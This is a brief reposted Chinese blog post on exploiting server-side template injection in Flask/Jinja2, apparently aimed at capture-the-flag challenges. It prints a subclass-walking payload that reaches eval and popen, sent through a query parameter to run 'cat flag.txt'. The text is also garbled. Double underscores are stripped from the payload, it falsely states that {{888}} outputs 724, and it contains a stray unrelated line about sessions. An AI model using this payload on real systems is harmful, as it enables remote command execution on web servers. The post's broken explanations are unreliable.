网站前后端的原因,全部的逻辑都放在了前端或者后端的话,就会造成执行的过于繁杂,所以我们就诞生了模板这一个东西,他可以将前端的显示和后端的代码分离,(就是让前端的工作人员注重表现设计,后端人员注重业务逻辑)同时简化代码的复杂程度,
本质上的模板就是将莫办文件和数据通过模板引擎生成最终的html代码
(注重一个点,渲染)
{{…}}这个就是我们经常用到的一个语句,比如{{888}}就会输出724
大部分其实就是因为模板本身的后端是支持这些东西的
其实就是对信息执行条件的不一样,造成了我们进行信息输入的时候,后端可能把他当成代码执行
就是把session分成了三部分这么回事
这里就是可以执行代码的地方
比如这个东西,我们其实{{(). class. bases[0]. subclasses()[182]. init. globals. builtins* ‘eval’}}
这个括号先加上,然后.点代表我们函数的那种递进关系就像xxx.xxx.xxx,然后【】括号代表查询并使用他的第几个子函数,我们也可以直接执行之类的
?name={{(). class. bases[0]. subclasses()[182]. init. globals. builtins‘eval’.popen(‘cat flag.txt’).read()”)}}
Original: https://blog.csdn.net/qq_50613938/article/details/122321147
Author: 落夜雨
Title: Flask SSTI利用方式探索
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/750217/
转载文章受原作者版权保护。转载请注明原作者出处!